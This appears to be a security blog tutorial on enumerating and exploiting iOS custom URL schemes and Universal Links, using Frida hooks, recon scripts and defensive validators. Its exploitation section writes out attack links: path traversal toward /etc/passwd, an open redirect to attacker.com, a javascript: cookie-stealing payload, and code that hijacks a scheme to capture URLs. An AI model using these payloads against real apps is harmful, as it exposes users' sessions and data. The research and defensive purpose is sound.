
Introduction:
Deep links in iOS apps—both custom URL schemes and Universal Links—create powerful user experiences but often introduce severe attack surfaces. Attackers can hijack these links to steal data, launch phishing attacks, or execute arbitrary code within trusted app contexts. Understanding how to identify, enumerate, and exploit these vectors is essential for both offensive researchers and defensive engineers.
Learning Objectives:
- Enumerate registered URL schemes and Universal Link paths from iOS apps without source code
- Use Frida runtime instrumentation to intercept and manipulate deep link handlers
- Exploit insecure parameter handling in custom URL schemes to trigger unauthorized actions
You Should Know:
1. Extracting URL Schemes from Compiled iOS Apps (Black-Box)
URL schemes are defined in the app’s `Info.plist` file. Even without source code, you can extract this file from the IPA or from a decrypted app on a jailbroken device.
Step-by-step guide:
- Obtain the IPA – Download from third-party sources or decrypt an App Store app using tools like `frida-ios-dump` or `bfinject`.
- Extract Info.plist – Unzip the IPA and locate `Payload/AppName.app/Info.plist`.

```bash
unzip target.ipa -d extracted/
cd extracted/Payload/*.app/
```

- View registered URL schemes – Use `plutil` or `defaults` to read the file.

```bash
plutil -p Info.plist | grep -A 5 "CFBundleURLSchemes"
# Alternative: convert to XML and grep
plutil -convert xml1 Info.plist -o - | grep -A 1 "<string>"
```

- Extract all schemes cleanly – Use a Python one-liner (`plistlib` reads both binary and XML plists, so no conversion is needed).

```bash
python3 -c 'import plistlib; [print(s) for t in plistlib.load(open("Info.plist", "rb")).get("CFBundleURLTypes", []) for s in t.get("CFBundleURLSchemes", [])]'
```

- Find path structures in the binary – Run `strings` with a regex to identify potential route patterns.

```bash
strings AppBinary | grep -E "^/([a-zA-Z0-9_-]+/)*[a-zA-Z0-9_-]+$" | sort -u
# Look for route patterns like "/user/profile", "/payment/confirm"
```

Windows alternative: Use `plutil.exe` via WSL or use `7zip` to extract the IPA, then parse `Info.plist` with PowerShell (convert a binary plist to XML first, since `Select-String` only works on text). After unzipping, use:

```powershell
Get-Content Info.plist | Select-String "CFBundleURLSchemes" -Context 0,5
```
2. Hunting Universal Links via apple-app-site-association
Universal Links use an HTTPS domain and a hosted JSON file. Attackers can discover these links even without the IPA.
Step-by-step guide:
- Extract domains from the binary – Use `strings` and grep for HTTPS patterns.

```bash
strings AppBinary | grep -E "https?://[a-zA-Z0-9.-]+" | sort -u
```

- Check for the association file – For each discovered domain, request `/.well-known/apple-app-site-association`.

```bash
curl -s https://example.com/.well-known/apple-app-site-association | jq .
# Look for "paths" or "components" arrays
```

- Enumerate all Universal Link paths – Use a wordlist if the file uses wildcards (`/app/*`). Fuzz with common paths. Download the file first:

```bash
wget https://target.com/.well-known/apple-app-site-association -O aasa.json
jq -r '.applinks.details[].paths[]?' aasa.json
```

- Test link handling – On a device, paste the link into the Notes app, long-press it and choose Open in the target app. Or use the `open` command via SSH on a jailbroken device.

```bash
open 'https://target.com/app/profile/123'
```
Exploitation angle: If the app accepts any path (wildcard), an attacker can craft malicious links that point to attacker-controlled domains but open in the victim app, leading to UI spoofing or parameter injection.
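The wildcard check described above, turned into an audit helper; this is an added example, not code from the post or from any project. The sample AASA content and the `TEAMID1234` app ID are constructed, and the helper covers both the legacy `paths` form and the newer `components` form so a reviewer can see which rules route more of the domain into the app than intended.

```python
import json

# Constructed sample apple-app-site-association (not from any real domain) mixing the
# legacy "paths" form with the newer "components" form; TEAMID1234 is a placeholder.
SAMPLE_AASA = json.dumps({"applinks": {"details": [
    {"appID": "TEAMID1234.com.example.bank",
     "paths": ["/profile/*", "NOT /admin/*", "/app/*", "*"]},
    {"appIDs": ["TEAMID1234.com.example.bank"],
     "components": [
         {"/": "/pay/confirm", "?": {"amount": "?*"}},
         {"/": "/*", "comment": "catch-all"},
         {"/": "/login", "exclude": True}]}]}})


def audit_aasa(text: str) -> list:
    """Return (appID, pattern, severity, note) for every overly broad link rule."""
    findings = []
    for detail in json.loads(text).get("applinks", {}).get("details", []):
        app = detail.get("appID") or ",".join(detail.get("appIDs", []))
        # Legacy form: list of path patterns; a "NOT " prefix excludes the pattern.
        for pattern in detail.get("paths", []):
            if pattern.startswith("NOT "):
                continue
            if pattern in ("*", "/*"):
                findings.append((app, pattern, "high", "catch-all: every URL on the domain opens the app"))
            elif "*" in pattern:
                findings.append((app, pattern, "medium", "prefix wildcard: handler must validate the suffix"))
        # Newer form: "/" is the path pattern, "?" the query pattern, "exclude" opts out.
        for comp in detail.get("components", []):
            if comp.get("exclude"):
                continue
            path = comp.get("/", "*")  # a component without "/" matches any path
            if path in ("*", "/*"):
                findings.append((app, path, "high", "catch-all component"))
            elif "*" in path:
                findings.append((app, path, "medium", "prefix wildcard component"))
            query = comp.get("?", {})
            if isinstance(query, dict):
                for key, rule in query.items():
                    if rule in ("*", "?*"):
                        findings.append((app, f"{path}?{key}={rule}", "medium", "unconstrained query parameter"))
    return findings


if __name__ == "__main__":
    for app, pattern, severity, note in audit_aasa(SAMPLE_AASA):
        print(f"[{severity}] {app}: {pattern} - {note}")
```

Point it at a downloaded `aasa.json` by passing the file contents to `audit_aasa`; excluded rules (`NOT` paths, `exclude: true` components) are skipped since they never open the app.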
3. Runtime Interception with Frida (Hooking openURL:)
The real attack surface lives inside the handler methods. Without source, use Frida to trace what the app does when a deep link arrives.
Step-by-step guide:
- Install Frida on a jailbroken device – Follow the frida.re docs. Then attach to the target app.

```bash
frida-ps -U                              # list running apps
frida -U -f com.target.app --no-pause    # spawn the app with Frida attached
```

- Hook the incoming handler `application:openURL:options:` – Save this script as `hook_openurl.js`. It resolves the app delegate at runtime, so attach to the already running app rather than spawning it. In Objective-C method hooks `args[0]` is `self`, `args[1]` is the selector, and the method's own parameters start at `args[2]`.

```javascript
// hook_openurl.js - trace incoming deep links in the app delegate plus the
// app's own outgoing opens.
var app = ObjC.classes.UIApplication.sharedApplication();
var delegate = app ? app.delegate() : null;
var sel = "- application:openURL:options:";
if (delegate && ObjC.classes[delegate.$className].$methods.indexOf(sel) !== -1) {
  // Incoming link: args[2] = UIApplication, args[3] = NSURL, args[4] = options
  Interceptor.attach(ObjC.classes[delegate.$className][sel].implementation, {
    onEnter: function (args) {
      var url = new ObjC.Object(args[3]);
      console.log("[*] " + delegate.$className + " " + sel + " called with: " + url.toString());
      // Print backtrace to see the caller
      console.log(Thread.backtrace(this.context, Backtracer.ACCURATE)
        .map(DebugSymbol.fromAddress).join('\n'));
    }
  });
} else {
  console.log("[!] delegate does not implement " + sel + " (UIScene-based app?)");
}

// Outgoing opens performed by the app itself: args[2] = NSURL
Interceptor.attach(ObjC.classes.UIApplication["- openURL:options:completionHandler:"].implementation, {
  onEnter: function (args) {
    console.log("[*] openURL:options:completionHandler: " + new ObjC.Object(args[2]).toString());
  }
});

// Also hook the deprecated -[UIApplication openURL:] for older code paths
var oldMethod = ObjC.classes.UIApplication["- openURL:"];
if (oldMethod) {
  Interceptor.attach(oldMethod.implementation, {
    onEnter: function (args) {
      console.log("[*] openURL: (deprecated) " + new ObjC.Object(args[2]).toString());
    }
  });
}
```

- Run the script – Trigger a deep link from another app or Safari.

```bash
frida -U com.target.app -l hook_openurl.js
```

- Enumerate all registered URL handlers – Use Frida to read `CFBundleURLTypes` from the running app's Info.plist (the related `LSApplicationQueriesSchemes` key lists the schemes the app itself is allowed to query).

```javascript
var NSBundle = ObjC.classes.NSBundle;
var mainBundle = NSBundle.mainBundle();
var infoDict = mainBundle.infoDictionary();
var schemes = infoDict.objectForKey_("CFBundleURLTypes");
console.log(schemes.toString());
```

- Modify parameters in flight – `onLeave` only sees the return value; to change the URL itself, replace the NSURL argument in `onEnter` before the handler runs.

```javascript
onLeave: function (retval) {
  // onLeave cannot change the URL. To rewrite it, build a new NSURL with
  // ObjC.classes.NSURL.URLWithString_() and assign its handle to args[3] in onEnter.
  console.log("Return value: " + retval);
}
```

Pro tip: Combine `frida-trace` with `-m "-[AppDelegate application:openURL:options:]"` for rapid tracing.
4. Exploiting Insecure Parameter Handling in URL Schemes
Once you discover a scheme like bankapp://transfer?to=account&amount=100, test for injection flaws.
Step-by-step guide:
- Fuzz parameters – Use Burp Suite or a custom script to generate variations. Example: test for path traversal in the handler.

```bash
open 'bankapp://../../../../etc/passwd'
open 'bankapp://%2e%2e%2fetc%2fpasswd'
```

- Test for open redirect – The app might load a web view using a `url` parameter.

```bash
open 'bankapp://web?url=https://attacker.com/phish'
```

- Chain with XSS in WebView – If the app loads your URL in a UIWebView/WKWebView, inject JavaScript.

```bash
open 'bankapp://web?url=javascript:alert(document.cookie)'
```

- Check for scheme hijacking – Register the same scheme in a second app. Install your app with `CFBundleURLSchemes` matching `bankapp`, then trigger the link – iOS might launch your app instead (race condition in older iOS versions). Test with:

```objectivec
// In your malicious app's AppDelegate
- (BOOL)application:(UIApplication *)app openURL:(NSURL *)url options:(NSDictionary<UIApplicationOpenURLOptionsKey, id> *)options {
    // Log the URL and its parameters that were delivered to this app instead of the target
    NSLog(@"Stolen URL: %@", url);
    return YES;
}
```

- Exploit via clipboard injection – Some apps auto-process URLs from the clipboard using `UIPasteboard`. Create a shortcut that writes your malicious scheme to the clipboard and triggers the app.

Mitigation: Always validate the source application using the `UIApplicationOpenURLOptionsSourceApplicationKey` entry of the `options` dictionary passed to `application:openURL:options:` (or the `sourceApplication` parameter of the older `application:openURL:sourceApplication:annotation:`). For Universal Links, Apple validates the domain, but handlers must still sanitize input.

5. Automating Discovery with Custom Scripts
Combine techniques into a single reconnaissance script.
Step-by-step guide – Bash automation:

```bash
#!/bin/bash
# ios-deeplink-scanner.sh - Scan an IPA for deep link attack surface
IPA="$1"
if [ -z "$IPA" ]; then echo "Usage: $0 app.ipa"; exit 1; fi
TMPDIR=$(mktemp -d)
unzip -q "$IPA" -d "$TMPDIR"
APP_DIR=$(find "$TMPDIR" -name "*.app" -type d | head -1)

echo "[+] Extracting URL Schemes from Info.plist"
plutil -p "$APP_DIR/Info.plist" | grep -E 'CFBundleURLSchemes|CFBundleURLName' -A 2

echo "[+] Extracting strings from binary"
# The main Mach-O executable sits at the top level of the .app bundle
BINARY=$(find "$APP_DIR" -maxdepth 1 -type f -perm -u+x -not -name "*.dylib" | head -1)
if [ -n "$BINARY" ]; then
  strings "$BINARY" | grep -E '(https?://|^[a-z]+://)' | sort -u > "$TMPDIR/urls.txt"
  echo "[+] Found $(wc -l < "$TMPDIR/urls.txt") URL references"
  grep -E '^[a-z]+://' "$TMPDIR/urls.txt" | head -20
fi

echo "[+] Checking for apple-app-site-association"
if [ -f "$TMPDIR/urls.txt" ]; then
  grep -E 'https?://[a-zA-Z0-9.-]+' "$TMPDIR/urls.txt" | cut -d'/' -f3 | sort -u | while read -r domain; do
    echo "    Checking $domain"
    curl -s -I "https://$domain/.well-known/apple-app-site-association" 2>/dev/null | head -1
  done
fi
rm -rf "$TMPDIR"
```
Run on macOS/Linux:
chmod +x ios-deeplink-scanner.sh ./ios-deeplink-scanner.sh target.ipa
Windows (WSL): Install WSL2 + Ubuntu for full compatibility.
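The validation a hardened `application:openURL:options:` handler should perform, following the Mitigation note in section 4, modelled here in Python as an added example (not code from the post) so it can be run offline against the `bankapp://` cases from that section. The trusted bundle IDs, action names and web hosts are constructed allowlists; `source_app` stands in for the `UIApplicationOpenURLOptionsSourceApplicationKey` value the handler receives.

```python
from typing import Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed allowlists for a hypothetical "bankapp" scheme (not from any real app).
TRUSTED_SOURCE_APPS = {"com.apple.mobilesafari", "com.example.bank-companion"}
ALLOWED_ACTIONS = {"transfer", "web", "profile"}
ALLOWED_WEB_HOSTS = {"www.example-bank.com", "help.example-bank.com"}


def validate_deep_link(link: str, source_app: Optional[str]) -> Tuple[bool, str]:
    """Return (accepted, reason) for an incoming custom-scheme URL.

    Mirrors the checks a hardened application:openURL:options: handler should make
    before acting; source_app is None when the OS supplies no source application,
    which is treated as untrusted.
    """
    # 1. Any app can register the same scheme, so only trust known callers.
    if source_app not in TRUSTED_SOURCE_APPS:
        return False, f"untrusted source application: {source_app!r}"
    parts = urlsplit(link)
    if parts.scheme != "bankapp":
        return False, f"unexpected scheme: {parts.scheme!r}"
    # 2. For a custom scheme the "host" is the action name; allowlist it.
    if parts.hostname not in ALLOWED_ACTIONS:
        return False, f"unknown action: {parts.hostname!r}"
    # 3. Reject traversal on the percent-decoded path so %2e%2e does not slip through.
    if ".." in unquote(parts.path).split("/"):
        return False, "path traversal attempt"
    params = parse_qs(parts.query, keep_blank_values=True)
    # 4. A WebView target must be https on an owned host; this blocks both the
    #    open redirect and the javascript: URL cases.
    if parts.hostname == "web":
        target = urlsplit(params.get("url", [""])[0])
        if target.scheme != "https" or target.hostname not in ALLOWED_WEB_HOSTS:
            return False, f"refusing untrusted web target: {target.geturl()!r}"
    # 5. Money movement: accept only strictly typed parameters.
    if parts.hostname == "transfer":
        to, amount = params.get("to", [""])[0], params.get("amount", [""])[0]
        if not (to.isalnum() and amount.isdigit()):
            return False, "malformed transfer parameters"
    return True, "ok"
```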
What Undercode Say:
- Key Takeaway 1: URL schemes are inherently dangerous because any app can register the same scheme. Always verify the calling app's bundle ID before processing sensitive actions.
- Key Takeaway 2: Universal Links provide better security through domain association, but wildcards in `paths` can expose unintended endpoints. Always restrict to explicit paths and validate parameters.
- Key Takeaway 3: Runtime instrumentation with Frida is the most effective black-box method to uncover hidden deep link handlers – static analysis alone misses dynamic behavior.
- Key Takeaway 4: Parameter injection vulnerabilities in deep links mirror traditional web attacks: path traversal, open redirect, and XSS via WebView are common and often overlooked.
- Key Takeaway 5: The iOS course from 8kSec (mentioned in the original post) provides structured training on these techniques, covering kernel internals and advanced Frida usage for vulnerability research.
Prediction:
As iOS adopts more privacy-focused features like Lockdown Mode and App Privacy Reports, deep link exploitation will shift toward abuse of legitimate Universal Links via DNS spoofing or compromised CDNs. Attackers will increasingly target the server-side components of `apple-app-site-association` files, poisoning the path mappings. Meanwhile, URL schemes will gradually be deprecated by major apps, but legacy support will keep them viable for years – making manual auditing and Frida instrumentation a critical skill for mobile security professionals through 2028 and beyond.
Reported By: This Blog - Hackers Feeds